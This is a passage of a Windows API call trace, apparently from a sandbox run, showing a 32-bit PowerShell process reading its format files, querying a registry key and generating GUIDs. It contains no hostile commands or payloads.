	[0160.947] SetErrorMode (uMode=0x1) returned 0x1
	[0160.948] GetFileType (hFile=0x348) returned 0x1
	[0160.948] ReadFile (in: hFile=0x348, lpBuffer=0x2ce9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce9918*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.948] GetLastError () returned 0x0
	[0160.948] ReadFile (in: hFile=0x348, lpBuffer=0x2ce9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce9918*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.948] GetLastError () returned 0x0
	[0160.948] ReadFile (in: hFile=0x348, lpBuffer=0x2ce9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce9918*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.948] GetLastError () returned 0x0
	[0160.948] ReadFile (in: hFile=0x348, lpBuffer=0x2ce9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce9918*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.948] GetLastError () returned 0x0
	[0160.948] ReadFile (in: hFile=0x348, lpBuffer=0x2ce9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce9918*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.948] GetLastError () returned 0x0
	[0160.948] ReadFile (in: hFile=0x348, lpBuffer=0x2ce9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce9918*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.948] GetLastError () returned 0x0
	[0160.948] ReadFile (in: hFile=0x348, lpBuffer=0x2ce9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce9918*, lpNumberOfBytesRead=0x10e614*=0x119, lpOverlapped=0x0) returned 1
	[0160.948] GetLastError () returned 0x0
	[0160.948] ReadFile (in: hFile=0x348, lpBuffer=0x2ce9918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2ce9918*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0160.949] GetLastError () returned 0x0
	[0160.949] CloseHandle (hObject=0x348) returned 1
	[0160.949] GetLastError () returned 0x0
	[0160.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.949] GetLastError () returned 0x0
	[0160.949] SetErrorMode (uMode=0x1) returned 0x1
	[0160.949] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d0a914 | out: lpFileInformation=0x2d0a914*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0160.949] GetLastError () returned 0x0
	[0160.949] SetErrorMode (uMode=0x1) returned 0x1
	[0160.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.949] GetLastError () returned 0x0
	[0160.949] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e598 | out: phkResult=0x10e598*=0x348) returned 0x0
	[0160.949] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x0, lpcbData=0x10e5dc*=0x0 | out: lpType=0x10e5e0*=0x1, lpData=0x0, lpcbData=0x10e5dc*=0x56) returned 0x0
	[0160.949] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x584bc0, lpcbData=0x10e5dc*=0x56 | out: lpType=0x10e5e0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e5dc*=0x56) returned 0x0
	[0160.950] RegCloseKey (hKey=0x348) returned 0x0
	[0160.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.950] GetLastError () returned 0x0
	[0160.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0160.950] GetLastError () returned 0x0
	[0160.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.950] GetLastError () returned 0x0
	[0160.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.950] GetLastError () returned 0x0
	[0160.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.950] GetLastError () returned 0x0
	[0160.950] VirtualQuery (in: lpAddress=0x10d2f0, lpBuffer=0x10e2f0, dwLength=0x1c | out: lpBuffer=0x10e2f0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.951] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x5257628e, Data2=0x269d, Data3=0x4cf2, Data4=([0]=0x98, [1]=0xba, [2]=0x46, [3]=0x64, [4]=0xc, [5]=0x4a, [6]=0x44, [7]=0x74))) returned 0x0
	[0160.951] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.951] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x2dcb3abd, Data2=0xfe32, Data3=0x45ce, Data4=([0]=0x8e, [1]=0xcd, [2]=0x56, [3]=0xad, [4]=0xfa, [5]=0x9e, [6]=0xe4, [7]=0x21))) returned 0x0
	[0160.951] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x6eb73742, Data2=0x210c, Data3=0x455a, Data4=([0]=0x81, [1]=0xb, [2]=0xd2, [3]=0x49, [4]=0xd6, [5]=0x22, [6]=0x63, [7]=0x6c))) returned 0x0
	[0160.951] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x5db7343d, Data2=0x6f71, Data3=0x458d, Data4=([0]=0x9d, [1]=0x8e, [2]=0xd3, [3]=0xf1, [4]=0xbf, [5]=0xed, [6]=0x2f, [7]=0x70))) returned 0x0
	[0160.951] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.951] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0160.952] GetLastError () returned 0x0
	[0160.952] SetErrorMode (uMode=0x1) returned 0x1
	[0160.952] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348
	[0160.952] GetLastError () returned 0x0
	[0160.952] GetFileType (hFile=0x348) returned 0x1
	[0160.952] SetErrorMode (uMode=0x1) returned 0x1
	[0160.952] GetFileType (hFile=0x348) returned 0x1
	[0160.952] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.952] GetLastError () returned 0x0
	[0160.952] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.952] GetLastError () returned 0x0
	[0160.953] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.953] GetLastError () returned 0x0
	[0160.953] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.953] GetLastError () returned 0x0
	[0160.953] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.953] GetLastError () returned 0x0
	[0160.953] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.953] GetLastError () returned 0x0
	[0160.953] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.953] GetLastError () returned 0x0
	[0160.953] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.953] GetLastError () returned 0x0
	[0160.954] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.954] GetLastError () returned 0x0
	[0160.955] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.955] GetLastError () returned 0x0
	[0160.955] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.955] GetLastError () returned 0x0
	[0160.955] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.955] GetLastError () returned 0x0
	[0160.955] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.955] GetLastError () returned 0x0
	[0160.956] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.956] GetLastError () returned 0x0
	[0160.956] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.956] GetLastError () returned 0x0
	[0160.956] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.956] GetLastError () returned 0x0
	[0160.959] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.959] GetLastError () returned 0x0
	[0160.959] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.959] GetLastError () returned 0x0
	[0160.960] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.960] GetLastError () returned 0x0
	[0160.960] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.960] GetLastError () returned 0x0
	[0160.961] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.961] GetLastError () returned 0x0
	[0160.961] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.962] GetLastError () returned 0x0
	[0160.962] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.962] GetLastError () returned 0x0
	[0160.962] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.962] GetLastError () returned 0x0
	[0160.962] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.962] GetLastError () returned 0x0
	[0160.963] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.963] GetLastError () returned 0x0
	[0160.963] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.963] GetLastError () returned 0x0
	[0160.963] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.963] GetLastError () returned 0x0
	[0160.963] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.963] GetLastError () returned 0x0
	[0160.964] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.964] GetLastError () returned 0x0
	[0160.964] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.964] GetLastError () returned 0x0
	[0160.964] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.964] GetLastError () returned 0x0
	[0160.969] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.969] GetLastError () returned 0x0
	[0160.969] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.969] GetLastError () returned 0x0
	[0160.969] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.969] GetLastError () returned 0x0
	[0160.969] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.970] GetLastError () returned 0x0
	[0160.970] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.970] GetLastError () returned 0x0
	[0160.970] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.970] GetLastError () returned 0x0
	[0160.970] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.970] GetLastError () returned 0x0
	[0160.970] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.970] GetLastError () returned 0x0
	[0160.971] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.971] GetLastError () returned 0x0
	[0160.971] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.971] GetLastError () returned 0x0
	[0160.971] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.971] GetLastError () returned 0x0
	[0160.971] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.971] GetLastError () returned 0x0
	[0160.971] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.972] GetLastError () returned 0x0
	[0160.972] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.972] GetLastError () returned 0x0
	[0160.972] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.972] GetLastError () returned 0x0
	[0160.972] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.972] GetLastError () returned 0x0
	[0160.972] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.972] GetLastError () returned 0x0
	[0160.973] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.973] GetLastError () returned 0x0
	[0160.973] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.973] GetLastError () returned 0x0
	[0160.973] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.973] GetLastError () returned 0x0
	[0160.973] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.974] GetLastError () returned 0x0
	[0160.974] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.974] GetLastError () returned 0x0
	[0160.974] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.974] GetLastError () returned 0x0
